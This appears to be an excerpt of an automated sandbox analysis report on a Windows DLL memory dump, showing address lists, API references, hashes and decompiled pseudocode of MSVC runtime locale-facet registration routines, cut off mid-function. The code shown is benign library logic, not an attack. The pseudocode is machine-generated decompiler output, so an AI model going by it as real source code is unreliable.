0x6d480afe
0x6d480b0b
0x6d480b13
0x6d480b15
0x00000000
0x6d480b15
0x6d480adc
0x6d480adc
0x00000000
0x6d480adc
0x6d480ada
0x6d480a4d
0x6d480a4d
0x6d480a50
0x6d480a54
0x6d480a58
0x6d480a65
0x6d480a6d
0x6d480a6f
0x00000000
0x6d480a6f
0x6d480a36
0x6d480a36
0x00000000
0x6d480a36
0x6d480a34
0x6d4809a7
0x6d4809a7
0x6d4809aa
0x6d4809ae
0x6d4809b2
0x6d4809bf
0x6d4809c7
0x6d4809c9
0x00000000
0x6d4809c9
0x6d480990
0x6d480990
0x00000000
0x6d480990
0x6d48098e
0x6d480901
0x6d480901
0x6d480904
0x6d480908
0x6d48090c
0x6d480919
0x6d480921
0x6d480923
0x00000000
0x6d480923
0x6d4808ea
0x6d4808ea
0x00000000
0x6d4808ea
0x6d4808e8

APIs

__EH_prolog3.LIBCMT ref: 6D4808B1
std::_Lockit::_Lockit.LIBCPMT ref: 6D4808BB

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48090C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48092C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48094A

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 3229c4b8c7bf10d7e66027bac29d40bc812933f2ed64c00864241529a6f299d9
Instruction ID: b549fafeacd3f6e5dae217e54e72226aeb4e8f047809c4f45a83c76aeb2e0ffc
Opcode Fuzzy Hash: 3229c4b8c7bf10d7e66027bac29d40bc812933f2ed64c00864241529a6f299d9
Instruction Fuzzy Hash: 5011AC3280412A8BCF15DFA6C840EEE77B5AF85364F26040DD610AB2A1DF74EE01DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47BA98, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D47BA98(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				char _v36;
				void* _t35;
				intOrPtr* _t36;
				void* _t48;
				intOrPtr* _t82;
				intOrPtr* _t92;
				void* _t94;
				void* _t95;
				void* _t106;

				_t68 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10( &_v20, 0);
				_t94 =  *0x6d53fd6c; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t94;
				_t35 = E6D451D10();
				_t71 = _a8;
				_t36 = E6D452140(_a8, _t35);
				_t91 = _t36;
				if(_t36 != 0) {
					L5:
					E6D476A77( &_v20);
					return E6D490E67(_t91);
				} else {
					if(_t94 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D47C132(__ebx, _t71, __edx, _t91, _t94, __eflags, _t106) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4( &_v32, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t91, _t94);
							E6D476A10( &_v20, 0);
							_t95 =  *0x6d53fd70; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t95;
							_t48 = E6D451D10();
							_t78 = _a8;
							_t92 = E6D452140(_a8, _t48);
							__eflags = _t92;
							if(_t92 != 0) {
								L12:
								E6D476A77( &_v20);
								return E6D490E67(_t92);
							} else {
								__eflags = _t95;
								if(__eflags == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6D47C19A(_t68, _t78, __edx, _t92, _t95, __eflags, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t82 =  &_v36;
										E6D451940();
										E6D4924F4( &_v36, 0x6d5329cc);
										asm("int3");
										_push(_t82);
										 *((intOrPtr*)(_t82 + 4)) = _v8;
										_v24 = _t82;
										 *_t82 = 0x6d5019fc;
										return _t82;
									} else {
										_t92 = _v16;
										_v16 = _t92;
										_v4 = 1;
										E6D478A0B(__eflags, _t92);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 4))))();
										 *0x6d53fd70 = _t92;
										goto L12;
									}
								} else {
									_t92 = _t95;
									goto L12;
								}
							}
						} else {
							_t91 = _v16;
							_v16 = _t91;
							_v4 = 1;
							E6D478A0B(__eflags, _t91);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 4))))();
							 *0x6d53fd6c = _t91;
							goto L5;
						}
					} else {
						_t91 = _t94;
						goto L5;
					}
				}
			}

0x6d47ba98
0x6d47ba98
0x6d47ba9f
0x6d47baa9
0x6d47baae
0x6d47bab9
0x6d47babd
0x6d47bac0
0x6d47bac5
0x6d47bac9
0x6d47bace
0x6d47bad2
0x6d47bb17
0x6d47bb1a
0x6d47bb26
0x6d47bad4
0x6d47bad6
0x6d47badc
0x6d47bae2
0x6d47baea
0x6d47baed
0x6d47bb2a
0x6d47bb38
0x6d47bb3d
0x6d47bb3e
0x6d47bb45
0x6d47bb4f
0x6d47bb54
0x6d47bb5f
0x6d47bb63
0x6d47bb66
0x6d47bb6b
0x6d47bb74
0x6d47bb76
0x6d47bb78
0x6d47bbbd
0x6d47bbc0
0x6d47bbcc
0x6d47bb7a
0x6d47bb7a
0x6d47bb7c
0x6d47bb82
0x6d47bb88
0x6d47bb90
0x6d47bb93
0x6d47bbcd
0x6d47bbd0
0x6d47bbde
0x6d47bbe3
0x6d47bbe7
0x6d47bbeb
0x6d47bbf0
0x6d47bbf3
0x6d47bbfa
0x6d47bb95
0x6d47bb95
0x6d47bb98
0x6d47bb9c
0x6d47bba0
0x6d47bbad
0x6d47bbb5
0x6d47bbb7
0x00000000
0x6d47bbb7
0x6d47bb7e
0x6d47bb7e
0x00000000
0x6d47bb7e
0x6d47bb7c
0x6d47baef
0x6d47baef
0x6d47baf2
0x6d47baf6
0x6d47bafa
0x6d47bb07
0x6d47bb0f
0x6d47bb11
0x00000000
0x6d47bb11
0x6d47bad8
0x6d47bad8
0x00000000
0x6d47bad8
0x6d47bad6

APIs

__EH_prolog3.LIBCMT ref: 6D47BA9F
std::_Lockit::_Lockit.LIBCPMT ref: 6D47BAA9

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D47BAFA
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BB1A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BB38

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 41f1bec44750d7a6432a94056eb96aae3fb122a0f726fbcb7ada1c4c7a32fb8f
Instruction ID: edf9d1510de5de9a4b89afd188f08ec27bcbe927fa6e0934a101447e8da26bcd
Opcode Fuzzy Hash: 41f1bec44750d7a6432a94056eb96aae3fb122a0f726fbcb7ada1c4c7a32fb8f
Instruction Fuzzy Hash: 88119A729042298BCF25DBA5C844EEE7775AF85328F26440DDA10AB390DF749E01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48075E, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D48075E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t237;
				signed int _t238;
				void* _t250;
				void* _t263;
				void* _t276;
				void* _t289;
				void* _t302;
				void* _t315;
				void* _t328;
				void* _t341;
				void* _t354;
				void* _t367;
				void* _t380;
				void* _t393;
				void* _t406;
				void* _t419;
				void* _t432;
				signed int _t625;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t698;
				signed int _t699;
				signed int _t700;
				signed int _t701;
				signed int _t702;
				signed int _t703;
				signed int _t704;
				signed int _t705;
				signed int _t706;
				signed int _t707;
				signed int _t708;
				signed int _t709;
				void* _t726;
				void* _t730;

				_t674 = __edx;
				_t513 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t726 - 0x14, 0);
				_t693 =  *0x6d53fe00; // 0x0
				 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
				 *(_t726 - 0x10) = _t693;
				_t237 = E6D451D10();
				_t516 =  *((intOrPtr*)(_t726 + 8));
				_t238 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t237);
				_t676 = _t238;
				if(_t238 != 0) {
					L5:
					E6D476A77(_t726 - 0x14);
					return E6D490E67(_t676);
				} else {
					if(_t693 == 0) {
						_push( *((intOrPtr*)(_t726 + 8)));
						_push(_t726 - 0x10);
						__eflags = E6D482425(__ebx, _t516, __edx, _t676, _t693, __eflags, _t730) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t726 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t676, _t693);
							E6D476A10(_t726 - 0x14, 0);
							_t694 =  *0x6d53fdd0; // 0x0
							 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
							 *(_t726 - 0x10) = _t694;
							_t250 = E6D451D10();
							_t523 =  *((intOrPtr*)(_t726 + 8));
							_t677 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t250);
							__eflags = _t677;
							if(_t677 != 0) {
								L12:
								E6D476A77(_t726 - 0x14);
								return E6D490E67(_t677);
							} else {
								__eflags = _t694;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t726 + 8)));
									_push(_t726 - 0x10);
									__eflags = E6D48248D(_t513, _t523, __edx, _t677, _t694, __eflags, _t730) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t726 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t513, _t677, _t694);
										E6D476A10(_t726 - 0x14, 0);
										_t695 =  *0x6d53fe04; // 0x0
										 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
										 *(_t726 - 0x10) = _t695;
										_t263 = E6D451D10();
										_t530 =  *((intOrPtr*)(_t726 + 8));
										_t678 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t263);
										__eflags = _t678;
										if(_t678 != 0) {
											L19:
											E6D476A77(_t726 - 0x14);
											return E6D490E67(_t678);
										} else {
											__eflags = _t695;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t726 + 8)));
												_push(_t726 - 0x10);
												__eflags = E6D4824F5(_t513, _t530, __edx, _t678, _t695, __eflags, _t730) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t726 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t513, _t678, _t695);
													E6D476A10(_t726 - 0x14, 0);
													_t696 =  *0x6d53fdd4; // 0x0
													 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
													 *(_t726 - 0x10) = _t696;
													_t276 = E6D451D10();
													_t537 =  *((intOrPtr*)(_t726 + 8));
													_t679 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t276);
													__eflags = _t679;
													if(_t679 != 0) {
														L26:
														E6D476A77(_t726 - 0x14);
														return E6D490E67(_t679);
													} else {
														__eflags = _t696;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t726 + 8)));
															_push(_t726 - 0x10);
															__eflags = E6D48255D(_t513, _t537, _t674, _t679, _t696, __eflags, _t730) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t726 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t513, _t679, _t696);
																E6D476A10(_t726 - 0x14, 0);
																_t697 =  *0x6d53fe0c; // 0x0
																 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																 *(_t726 - 0x10) = _t697;
																_t289 = E6D451D10();
																_t544 =  *((intOrPtr*)(_t726 + 8));
																_t680 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t289);
																__eflags = _t680;
																if(_t680 != 0) {
																	L33:
																	E6D476A77(_t726 - 0x14);
																	return E6D490E67(_t680);
																} else {
																	__eflags = _t697;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t726 + 8)));
																		_push(_t726 - 0x10);
																		__eflags = E6D4825C5(_t513, _t544, _t674, _t680, _t697, __eflags, _t730) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t726 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t513, _t680, _t697);
																			E6D476A10(_t726 - 0x14, 0);
																			_t698 =  *0x6d53fe08; // 0x0
																			 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																			 *(_t726 - 0x10) = _t698;
																			_t302 = E6D451D10();
																			_t551 =  *((intOrPtr*)(_t726 + 8));
																			_t681 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t302);
																			__eflags = _t681;
																			if(_t681 != 0) {
																				L40:
																				E6D476A77(_t726 - 0x14);
																				return E6D490E67(_t681);
																			} else {
																				__eflags = _t698;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t726 + 8)));
																					_push(_t726 - 0x10);
																					__eflags = E6D482649(_t513, _t551, _t674, _t681, _t698, __eflags, _t730) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t726 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t513, _t681, _t698);
																						E6D476A10(_t726 - 0x14, 0);
																						_t699 =  *0x6d53fddc; // 0x0
																						 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																						 *(_t726 - 0x10) = _t699;
																						_t315 = E6D451D10();
																						_t558 =  *((intOrPtr*)(_t726 + 8));
																						_t682 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t315);
																						__eflags = _t682;
																						if(_t682 != 0) {
																							L47:
																							E6D476A77(_t726 - 0x14);
																							return E6D490E67(_t682);
																						} else {
																							__eflags = _t699;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t726 + 8)));
																								_push(_t726 - 0x10);
																								__eflags = E6D4826CE(_t513, _t558, _t674, _t682, _t699, __eflags, _t730) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D451940();
																									E6D4924F4(_t726 - 0x20, 0x6d5329cc);
																									asm("int3");
																									_push(0x14);
																									E6D490E9E(0x6d4fe9a2, _t513, _t682, _t699);
																									E6D476A10(_t726 - 0x14, 0);
																									_t700 =  *0x6d53fdd8; // 0x0
																									 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																									 *(_t726 - 0x10) = _t700;
																									_t328 = E6D451D10();
																									_t565 =  *((intOrPtr*)(_t726 + 8));
																									_t683 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t328);
																									__eflags = _t683;
																									if(_t683 != 0) {
																										L54:
																										E6D476A77(_t726 - 0x14);
																										return E6D490E67(_t683);
																									} else {
																										__eflags = _t700;
																										if(__eflags == 0) {
																											_push( *((intOrPtr*)(_t726 + 8)));
																											_push(_t726 - 0x10);
																											__eflags = E6D482752(_t513, _t565, _t674, _t683, _t700, __eflags, _t730) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D451940();
																												E6D4924F4(_t726 - 0x20, 0x6d5329cc);
																												asm("int3");
																												_push(0x14);
																												E6D490E9E(0x6d4fe9a2, _t513, _t683, _t700);
																												E6D476A10(_t726 - 0x14, 0);
																												_t701 =  *0x6d53fdec; // 0x0
																												 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																												 *(_t726 - 0x10) = _t701;
																												_t341 = E6D451D10();
																												_t572 =  *((intOrPtr*)(_t726 + 8));
																												_t684 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t341);
																												__eflags = _t684;
																												if(_t684 != 0) {
																													L61:
																													E6D476A77(_t726 - 0x14);
																													return E6D490E67(_t684);
																												} else {
																													__eflags = _t701;
																													if(__eflags == 0) {
																														_push( *((intOrPtr*)(_t726 + 8)));
																														_push(_t726 - 0x10);
																														__eflags = E6D4827D7(_t513, _t572, _t674, _t684, _t701, __eflags, _t730) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D451940();
																															E6D4924F4(_t726 - 0x20, 0x6d5329cc);
																															asm("int3");
																															_push(0x14);
																															E6D490E9E(0x6d4fe9a2, _t513, _t684, _t701);
																															E6D476A10(_t726 - 0x14, 0);
																															_t702 =  *0x6d53fdc4; // 0x0
																															 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																															 *(_t726 - 0x10) = _t702;
																															_t354 = E6D451D10();
																															_t579 =  *((intOrPtr*)(_t726 + 8));
																															_t685 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t354);
																															__eflags = _t685;
																															if(_t685 != 0) {
																																L68:
																																E6D476A77(_t726 - 0x14);
																																return E6D490E67(_t685);
																															} else {
																																__eflags = _t702;
																																if(__eflags == 0) {
																																	_push( *((intOrPtr*)(_t726 + 8)));
																																	_push(_t726 - 0x10);
																																	__eflags = E6D48283F(_t513, _t579, _t674, _t685, _t702, __eflags, _t730) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D451940();
																																		E6D4924F4(_t726 - 0x20, 0x6d5329cc);
																																		asm("int3");
																																		_push(0x14);
																																		E6D490E9E(0x6d4fe9a2, _t513, _t685, _t702);
																																		E6D476A10(_t726 - 0x14, 0);
																																		_t703 =  *0x6d53fdf0; // 0x0
																																		 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																		 *(_t726 - 0x10) = _t703;
																																		_t367 = E6D451D10();
																																		_t586 =  *((intOrPtr*)(_t726 + 8));
																																		_t686 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t367);
																																		__eflags = _t686;
																																		if(_t686 != 0) {
																																			L75:
																																			E6D476A77(_t726 - 0x14);
																																			return E6D490E67(_t686);
																																		} else {
																																			__eflags = _t703;
																																			if(__eflags == 0) {
																																				_push( *((intOrPtr*)(_t726 + 8)));
																																				_push(_t726 - 0x10);
																																				__eflags = E6D4828A7(_t513, _t586, _t674, _t686, _t703, __eflags, _t730) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D451940();
																																					E6D4924F4(_t726 - 0x20, 0x6d5329cc);
																																					asm("int3");
																																					_push(0x14);
																																					E6D490E9E(0x6d4fe9a2, _t513, _t686, _t703);
																																					E6D476A10(_t726 - 0x14, 0);
																																					_t704 =  *0x6d53fdf4; // 0x0
																																					 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																					 *(_t726 - 0x10) = _t704;
																																					_t380 = E6D451D10();
																																					_t593 =  *((intOrPtr*)(_t726 + 8));
																																					_t687 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t380);
																																					__eflags = _t687;
																																					if(_t687 != 0) {
																																						L82:
																																						E6D476A77(_t726 - 0x14);
																																						return E6D490E67(_t687);
																																					} else {
																																						__eflags = _t704;
																																						if(__eflags == 0) {
																																							_push( *((intOrPtr*)(_t726 + 8)));
																																							_push(_t726 - 0x10);
																																							__eflags = E6D48290F(_t513, _t593, _t674, _t687, _t704, __eflags, _t730) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D451940();
																																								E6D4924F4(_t726 - 0x20, 0x6d5329cc);
																																								asm("int3");
																																								_push(0x14);
																																								E6D490E9E(0x6d4fe9a2, _t513, _t687, _t704);
																																								E6D476A10(_t726 - 0x14, 0);
																																								_t705 =  *0x6d53fe10; // 0x0
																																								 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																								 *(_t726 - 0x10) = _t705;
																																								_t393 = E6D451D10();
																																								_t600 =  *((intOrPtr*)(_t726 + 8));
																																								_t688 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t393);
																																								__eflags = _t688;
																																								if(_t688 != 0) {
																																									L89:
																																									E6D476A77(_t726 - 0x14);
																																									return E6D490E67(_t688);
																																								} else {
																																									__eflags = _t705;
																																									if(__eflags == 0) {
																																										_push( *((intOrPtr*)(_t726 + 8)));
																																										_push(_t726 - 0x10);
																																										__eflags = E6D48298A(_t513, _t600, _t674, _t688, _t705, __eflags, _t730) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D451940();
																																											E6D4924F4(_t726 - 0x20, 0x6d5329cc);
																																											asm("int3");
																																											_push(0x14);
																																											E6D490E9E(0x6d4fe9a2, _t513, _t688, _t705);
																																											E6D476A10(_t726 - 0x14, 0);
																																											_t706 =  *0x6d53fde0; // 0x0
																																											 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																											 *(_t726 - 0x10) = _t706;
																																											_t406 = E6D451D10();
																																											_t607 =  *((intOrPtr*)(_t726 + 8));
																																											_t689 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t406);
																																											__eflags = _t689;
																																											if(_t689 != 0) {
																																												L96:
																																												E6D476A77(_t726 - 0x14);
																																												return E6D490E67(_t689);
																																											} else {
																																												__eflags = _t706;
																																												if(__eflags == 0) {
																																													_push( *((intOrPtr*)(_t726 + 8)));
																																													_push(_t726 - 0x10);
																																													__eflags = E6D4829F6(_t513, _t607, _t674, _t689, _t706, __eflags, _t730) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D451940();
																																														E6D4924F4(_t726 - 0x20, 0x6d5329cc);
																																														asm("int3");
																																														_push(0x14);
																																														E6D490E9E(0x6d4fe9a2, _t513, _t689, _t706);
																																														E6D476A10(_t726 - 0x14, 0);
																																														_t707 =  *0x6d53fe14; // 0x0
																																														 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																														 *(_t726 - 0x10) = _t707;
																																														_t419 = E6D451D10();
																																														_t614 =  *((intOrPtr*)(_t726 + 8));
																																														_t690 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t419);
																																														__eflags = _t690;
																																														if(_t690 != 0) {
																																															L103:
																																															E6D476A77(_t726 - 0x14);
																																															return E6D490E67(_t690);
																																														} else {
																																															__eflags = _t707;
																																															if(__eflags == 0) {
																																																_push( *((intOrPtr*)(_t726 + 8)));
																																																_push(_t726 - 0x10);
																																																__eflags = E6D482A62(_t513, _t614, _t674, _t690, _t707, __eflags, _t730) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D451940();
																																																	E6D4924F4(_t726 - 0x20, 0x6d5329cc);
																																																	asm("int3");
																																																	_push(0x14);
																																																	E6D490E9E(0x6d4fe9a2, _t513, _t690, _t707);
																																																	E6D476A10(_t726 - 0x14, 0);
																																																	_t708 =  *0x6d53fde4; // 0x0
																																																	 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																																	 *(_t726 - 0x10) = _t708;
																																																	_t432 = E6D451D10();
																																																	_t621 =  *((intOrPtr*)(_t726 + 8));
																																																	_t691 = E6D452140( *((intOrPtr*)(_t726 + 8)), _t432);
																																																	__eflags = _t691;
																																																	if(_t691 != 0) {
																																																		L110:
																																																		E6D476A77(_t726 - 0x14);
																																																		return E6D490E67(_t691);
																																																	} else {
																																																		__eflags = _t708;
																																																		if(__eflags == 0) {
																																																			_push( *((intOrPtr*)(_t726 + 8)));
																																																			_push(_t726 - 0x10);
																																																			__eflags = E6D482AC8(_t513, _t621, _t674, _t691, _t708, __eflags, _t730) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				_t625 = _t726 - 0x20;
																																																				E6D451940();
																																																				E6D4924F4(_t726 - 0x20, 0x6d5329cc);
																																																				asm("int3");
																																																				_push(4);
																																																				E6D490E9E(0x6d4fefbc, _t513, _t691, _t708);
																																																				_t709 = _t625;
																																																				 *(_t726 - 0x10) = _t709;
																																																				 *((intOrPtr*)(_t709 + 4)) =  *((intOrPtr*)(_t726 + 0xc));
																																																				_push( *((intOrPtr*)(_t726 + 0x14)));
																																																				_push( *((intOrPtr*)(_t726 + 8)));
																																																				_t231 = _t726 - 4;
																																																				 *_t231 =  *(_t726 - 4) & 0x00000000;
																																																				__eflags =  *_t231;
																																																				 *_t709 = 0x6d5041ac;
																																																				 *((char*)(_t709 + 0x28)) =  *((intOrPtr*)(_t726 + 0x10));
																																																				E6D4868B7(_t513, _t625, _t674, _t691, _t709,  *_t231, _t730);
																																																				return E6D490E67(_t709);
																																																			} else {
																																																				_t691 =  *(_t726 - 0x10);
																																																				 *(_t726 - 0x10) = _t691;
																																																				 *(_t726 - 4) = 1;
																																																				E6D478A0B(__eflags, _t691);
																																																				 *0x6d5001e8();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t691 + 4))))();
																																																				 *0x6d53fde4 = _t691;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t691 = _t708;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t690 =  *(_t726 - 0x10);
																																																	 *(_t726 - 0x10) = _t690;
																																																	 *(_t726 - 4) = 1;
																																																	E6D478A0B(__eflags, _t690);
																																																	 *0x6d5001e8();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t690 + 4))))();
																																																	 *0x6d53fe14 = _t690;
																																																	goto L103;
																																																}
																																															} else {
																																																_t690 = _t707;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t689 =  *(_t726 - 0x10);
																																														 *(_t726 - 0x10) = _t689;
																																														 *(_t726 - 4) = 1;
																																														E6D478A0B(__eflags, _t689);
																																														 *0x6d5001e8();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t689 + 4))))();
																																														 *0x6d53fde0 = _t689;
																																														goto L96;
																																													}
																																												} else {
																																													_t689 = _t706;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t688 =  *(_t726 - 0x10);
																																											 *(_t726 - 0x10) = _t688;
																																											 *(_t726 - 4) = 1;
																																											E6D478A0B(__eflags, _t688);
																																											 *0x6d5001e8();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t688 + 4))))();
																																											 *0x6d53fe10 = _t688;
																																											goto L89;
																																										}
																																									} else {
																																										_t688 = _t705;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t687 =  *(_t726 - 0x10);
																																								 *(_t726 - 0x10) = _t687;
																																								 *(_t726 - 4) = 1;
																																								E6D478A0B(__eflags, _t687);
																																								 *0x6d5001e8();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t687 + 4))))();
																																								 *0x6d53fdf4 = _t687;
																																								goto L82;
																																							}
																																						} else {
																																							_t687 = _t704;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t686 =  *(_t726 - 0x10);
																																					 *(_t726 - 0x10) = _t686;
																																					 *(_t726 - 4) = 1;
																																					E6D478A0B(__eflags, _t686);
																																					 *0x6d5001e8();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t686 + 4))))();
																																					 *0x6d53fdf0 = _t686;
																																					goto L75;
																																				}
																																			} else {
																																				_t686 = _t703;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t685 =  *(_t726 - 0x10);
																																		 *(_t726 - 0x10) = _t685;
																																		 *(_t726 - 4) = 1;
																																		E6D478A0B(__eflags, _t685);
																																		 *0x6d5001e8();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t685 + 4))))();
																																		 *0x6d53fdc4 = _t685;
																																		goto L68;
																																	}
																																} else {
																																	_t685 = _t702;
																																	goto L68;
																																}
																															}
																														} else {
																															_t684 =  *(_t726 - 0x10);
																															 *(_t726 - 0x10) = _t684;
																															 *(_t726 - 4) = 1;
																															E6D478A0B(__eflags, _t684);
																															 *0x6d5001e8();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t684 + 4))))();
																															 *0x6d53fdec = _t684;
																															goto L61;
																														}
																													} else {
																														_t684 = _t701;
																														goto L61;
																													}
																												}
																											} else {
																												_t683 =  *(_t726 - 0x10);
																												 *(_t726 - 0x10) = _t683;
																												 *(_t726 - 4) = 1;
																												E6D478A0B(__eflags, _t683);
